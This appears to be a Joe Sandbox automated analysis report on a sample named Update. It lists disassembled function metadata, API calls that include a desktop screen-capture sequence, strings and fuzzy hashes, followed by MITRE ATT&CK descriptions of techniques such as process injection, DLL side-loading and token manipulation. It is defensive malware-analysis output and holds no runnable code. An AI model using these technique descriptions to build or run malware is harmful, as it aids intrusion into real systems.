Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
String ID:
API String ID: 3067319862-0
Opcode ID: 9148f16bbdedd300ba9a025a0783e179fe7d027d7505f24983820cf9497922f9
Instruction ID: 470aff3489cc7c470db460cd1f32745a9c4da612987646137aa74d456d780b30
Opcode Fuzzy Hash: 9148f16bbdedd300ba9a025a0783e179fe7d027d7505f24983820cf9497922f9
Instruction Fuzzy Hash: 78E0483660036A7B8F152B97CA089893F79EB067AD7054150F909E3610CB318DD2D7D0

Function 6CA9BCAF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CA9BE51

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 6CA9BD7C, 6CA9BD81, 6CA9BD9D, 6CA9BDD2, 6CA9BDD7
-, xrefs: 6CA9BE7F

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: a30847a847bb42a7a7d8c58dc7df8a8da37abdf859116ac70011d1ad057289ed
Instruction ID: 41acefbc1a74090358555786166a6f1c8fb4bb0c495db8869cdaa3ab7d29b4df
Opcode Fuzzy Hash: a30847a847bb42a7a7d8c58dc7df8a8da37abdf859116ac70011d1ad057289ed
Instruction Fuzzy Hash: 2C613870E242499FDF20CEA9D8827AEBBF9AF45304F184299D450ABB50C77489C58B50

Function 6CAB5872 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CAAA893: GetLastError.KERNEL32(?,?,6CAA5151,?,6CA81A6D,00000000), ref: 6CAAA897
Part of subcall function 6CAAA893: SetLastError.KERNEL32(00000000,6CA81A6D,00000000), ref: 6CAAA939

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,6CAAB1CB,?,?,?,00000055,?,-00000050,?,?,?), ref: 6CAB5931
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,6CAAB1CB,?,?,?,00000055,?,-00000050,?,?), ref: 6CAB5968

Strings

utf8, xrefs: 6CAB5A3A

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: c38c7f1c403e3978a0cc5575feafc8516c73928c0f8a4871140bdabb9075a326
Instruction ID: 02ac32aa8f7dd621b274f1c3152064e157c20d4f5db812f9ce9d4c88b6494a4e
Opcode Fuzzy Hash: c38c7f1c403e3978a0cc5575feafc8516c73928c0f8a4871140bdabb9075a326
Instruction Fuzzy Hash: 5F511631605305AAE714ABB5CC89BE773ACEF09718F18042EE515B7A80F771D6C9C7A1

Function 6CA826C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 6CA9B51D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CA9B529

_strlen.LIBCMT ref: 6CA82718

Strings

string too long, xrefs: 6CA826C0
ios_base::badbit set, xrefs: 6CA826D5

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlenstd::invalid_argument::invalid_argument
String ID: ios_base::badbit set$string too long
API String ID: 4097767454-3021579929
Opcode ID: 7b5b43e7bdb7d3761e9c1092b3b507ece3404317dcef324006afc86668a016b0
Instruction ID: 266dbb6693c2c4aadf6c4401b1b22158c48c9ca1129c2ce71e5523645f2c4ad3
Opcode Fuzzy Hash: 7b5b43e7bdb7d3761e9c1092b3b507ece3404317dcef324006afc86668a016b0
Instruction Fuzzy Hash: A841C8B2D112189FCB10CFA9DD85BEEBBB9FF48314F150625E805A7740E7319998C7A1

Function 6CAA3691 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CAA3709
__freea.LIBCMT ref: 6CAA37A1

Strings

gfff, xrefs: 6CAA37AD

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: __alloca_probe_16__freea
String ID: gfff
API String ID: 1635606685-1553575800
Opcode ID: 447b51e6a7f64eaa924e28e9249781c5849d12a080851340c8c23540489119c7
Instruction ID: b89412634b8190231affd0c8e1ca86c378c7a1c838b2d7246cde090d4697aaef
Opcode Fuzzy Hash: 447b51e6a7f64eaa924e28e9249781c5849d12a080851340c8c23540489119c7
Instruction Fuzzy Hash: 19313CB6E036169BCB11CEE9C940A9FB7B49F4171CB69062DC8A1E7E40E730D9C78790

Function 6CAAA0C7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,6CAA9FC8,?,?,00000000,00000000,00000000,?), ref: 6CAAA0EC

Strings

MOC, xrefs: 6CAAA0FE
RCC, xrefs: 6CAAA106

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 190cfa80d0e4b0a4bf1a1228e74d06c600278869ad46dc33bc6d8d8a2e6762c2
Instruction ID: b0c47bf7e5c6debf10af9ebc62c9e70a6331db9bc1dd03c80d3fc2ab04f54bd9
Opcode Fuzzy Hash: 190cfa80d0e4b0a4bf1a1228e74d06c600278869ad46dc33bc6d8d8a2e6762c2
Instruction Fuzzy Hash: 78413871A01209AFCF05CFD4C980AEEBBB6FF48308F188159E91567650D3369996DF51

Function 6CA830B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CA830E6
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA83222

Part of subcall function 6CA9B0F3: _Yarn.LIBCPMT ref: 6CA9B113
Part of subcall function 6CA9B0F3: _Yarn.LIBCPMT ref: 6CA9B137

Strings

bad locale name, xrefs: 6CA83166

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: LockitYarnstd::_$Lockit::_Lockit::~_
String ID: bad locale name
API String ID: 2070049627-1405518554
Opcode ID: ec120b4588b4926c737e649638b8d9f09f62d8270d27d5f899096de57c271463
Instruction ID: 6ee553133cb36af9976532687a199820f5918de37fa837d95fdca4227039a2da
Opcode Fuzzy Hash: ec120b4588b4926c737e649638b8d9f09f62d8270d27d5f899096de57c271463
Instruction Fuzzy Hash: D94159F1A016059BEB10CF69D904B5BBAE8BB04B08F044628E4599BB80E779E55CCBE1

Function 6CAA9933 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6CAA9BAA

Strings

csm, xrefs: 6CAA9C3D
csm, xrefs: 6CAA9BCC

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: d5d2a1d05f3bdb2b06b8b4b8d6cd7e50ff8e133c35ad7ea64f3880406e127272
Instruction ID: 1e60cabaf4af88a200e6827625794bc01e4cec3a543b820c3da6d4ad2d8bea3f
Opcode Fuzzy Hash: d5d2a1d05f3bdb2b06b8b4b8d6cd7e50ff8e133c35ad7ea64f3880406e127272
Instruction Fuzzy Hash: C131A132414618BFCF128FE5CA4099A7BAAFB09719B18465AF8544B921C333C8E3DB91

Function 037FB19D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 037FBC70: GetDesktopWindow.USER32 ref: 037FBC8F
Part of subcall function 037FBC70: GetDC.USER32(00000000), ref: 037FBC9C
Part of subcall function 037FBC70: CreateCompatibleDC.GDI32(00000000), ref: 037FBCA2
Part of subcall function 037FBC70: GetDC.USER32(00000000), ref: 037FBCAD
Part of subcall function 037FBC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 037FBCBA
Part of subcall function 037FBC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 037FBCC2
Part of subcall function 037FBC70: ReleaseDC.USER32(00000000,00000000), ref: 037FBCD3
Part of subcall function 037FBC70: GetSystemMetrics.USER32(0000004C), ref: 037FBD78
Part of subcall function 037FBC70: GetSystemMetrics.USER32(0000004D), ref: 037FBD8D
Part of subcall function 037FBC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 037FBDA6
Part of subcall function 037FBC70: SelectObject.GDI32(?,00000000), ref: 037FBDB4
Part of subcall function 037FBC70: SetStretchBltMode.GDI32(?,00000003), ref: 037FBDC0
Part of subcall function 037FBC70: GetSystemMetrics.USER32(0000004F), ref: 037FBDCD
Part of subcall function 037FBC70: GetSystemMetrics.USER32(0000004E), ref: 037FBDE0

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

_memset.LIBCMT ref: 037FB1E1
swprintf.LIBCMT ref: 037FB204

Strings

%s %s, xrefs: 037FB1F3

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
String ID: %s %s
API String ID: 1028806752-581060391
Opcode ID: 20b1a142c5ada7b0a398fe28db596add813da2de8d32daade796057b0431cb9f
Instruction ID: b42dc752cdb52b4bd1322eddd818a95bc2dbb08ad1eb89ed57130cf26e797396
Opcode Fuzzy Hash: 20b1a142c5ada7b0a398fe28db596add813da2de8d32daade796057b0431cb9f
Instruction Fuzzy Hash: 0D21E1B6A04340AFD210EF58DC84E5FB7E8BFD9710F08056EF9899A301EA60D914C7A3

Function 037F9100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 037F9115

Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF4E
Part of subcall function 037FEF39: __CxxThrowException@8.LIBCMT ref: 037FEF63
Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF74

std::_Xinvalid_argument.LIBCPMT ref: 037F9128

Strings

string too long, xrefs: 037F9110, 037F9123

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: a3fe3bb755f92e2a6cf6817ff0a750902d609b77223eee2fd13c948867f4df4a
Instruction ID: c89c2c912b9efc3c80c421e884edcb73882ddf0faa9f0f48e727039728206b29
Opcode Fuzzy Hash: a3fe3bb755f92e2a6cf6817ff0a750902d609b77223eee2fd13c948867f4df4a
Instruction Fuzzy Hash: 911190763043408FC321DA6CE804B1AB7E9BBE7A21F140A7AE391CB751C772D804C7A5

Function 037F93F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 037F941D
std::_Xinvalid_argument.LIBCPMT ref: 037F944A

Strings

invalid string position, xrefs: 037F9445

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position
API String ID: 3614006799-1799206989
Opcode ID: 386563a5db77daf5524b33ba6f01ae2bfe94c27575d442e1e2dd18123550b18f
Instruction ID: 599eb2dcedae495875754d7b92e1eb374b43d3302857985a7f906a583fbba1b1
Opcode Fuzzy Hash: 386563a5db77daf5524b33ba6f01ae2bfe94c27575d442e1e2dd18123550b18f
Instruction Fuzzy Hash: 4D01F7336003045FD324EE6CD8847AAF799BB52620F140A69E7529F7C1D771EA44C791

Function 006E1AB7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006E1AC2
___raise_securityfailure.LIBCMT ref: 006E1BAA

Strings

0n, xrefs: 006E1BA5

Memory Dump Source

Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_Update.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 0n
API String ID: 3761405300-2440949296
Opcode ID: 87c7b767ba9a582c09c99674da6209699803d8c6c166f925a227a08dceb1bbdf
Instruction ID: fb9dacd26d84d7198d7dd826fb88649d989cb9f254ac86e02525db9daf4cdd0d
Opcode Fuzzy Hash: 87c7b767ba9a582c09c99674da6209699803d8c6c166f925a227a08dceb1bbdf
Instruction Fuzzy Hash: E221B7B56013A19AD714CF16E9CEA907BA6BB09314F20606EE9058F3A0E7B197848F45

Function 037F9570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 037F957F

Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEF9B
Part of subcall function 037FEF86: __CxxThrowException@8.LIBCMT ref: 037FEFB0
Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEFC1

_memmove.LIBCMT ref: 037F95B5

Strings

invalid string position, xrefs: 037F957A

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 38981ae2e53f40f4a189f1df440cf80ccc094a92422955787a5ea2a1635d373d
Instruction ID: 4c06410381b9e38321ff6c47fcee61ce89af0aa8b12afcb0ae4c48dbede81b92
Opcode Fuzzy Hash: 38981ae2e53f40f4a189f1df440cf80ccc094a92422955787a5ea2a1635d373d
Instruction Fuzzy Hash: F8014F317047018FD725CA6CED9472AB3E7BBC65047284A68D391CBB8AD7B1DC424794

Function 037FD1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 037FD1D4

Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF4E
Part of subcall function 037FEF39: __CxxThrowException@8.LIBCMT ref: 037FEF63
Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF74

_memmove.LIBCMT ref: 037FD20D

Strings

vector<T> too long, xrefs: 037FD1CF

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: d1105f5b6772a292dc272288e6085a165a3283242092e1bf0665be865d974a8c
Instruction ID: 5e35f6a5964b18d98158d824609c21d7147ba37cf10d87995ff3bee70ad21d59
Opcode Fuzzy Hash: d1105f5b6772a292dc272288e6085a165a3283242092e1bf0665be865d974a8c
Instruction Fuzzy Hash: 0801DD7A9006059FCB20FE6DEC99C2E77D8F6603513698279DD21C375CE770E8148790

Function 037F8430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 037F8443

Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF4E
Part of subcall function 037FEF39: __CxxThrowException@8.LIBCMT ref: 037FEF63
Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF74

_memmove.LIBCMT ref: 037F846E

Strings

vector<T> too long, xrefs: 037F843E

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: c19e0a5ee637c081274dca715d8c0c2d1d0558e93e86a2c4fa25b7afae6bdd1e
Instruction ID: 423a574c533bd41038014fe012da5701226ad87986f886cd29e41acd680badd6
Opcode Fuzzy Hash: c19e0a5ee637c081274dca715d8c0c2d1d0558e93e86a2c4fa25b7afae6bdd1e
Instruction Fuzzy Hash: C201A2B160030A9FCB24DFA8DC9593BB3E8FF542103184A2DE956CB750E630F800C761

Function 038106D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0381010A: __getptd.LIBCMT ref: 03810110
Part of subcall function 0381010A: __getptd.LIBCMT ref: 03810120

__getptd.LIBCMT ref: 038106E3

Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B

__getptd.LIBCMT ref: 038106F1

Strings

csm, xrefs: 038106FF

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
Instruction ID: be453f9734491b2ad22c8d9bb62e4b085e564c382051b697cc9c999ac4e38013
Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
Instruction Fuzzy Hash: 880128BA8003058ECF35DFE5D8846ADB7BDAF04211F6849AED059DA690DB3295E1CE42

Function 100137C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100132AE: __getptd.LIBCMT ref: 100132B4
Part of subcall function 100132AE: __getptd.LIBCMT ref: 100132C4

__getptd.LIBCMT ref: 100137D8

Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F

__getptd.LIBCMT ref: 100137E6

Strings

csm, xrefs: 100137F4

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
Instruction ID: 7ab74b7057de6af6c41b09604486a57fd509075c87a44dfcf8772f30d13ae725
Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
Instruction Fuzzy Hash: 2001283A8013468FDB24DF26C44069CB3F6FF00651F51842DF4955A6A1CF34EAD1CA11

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
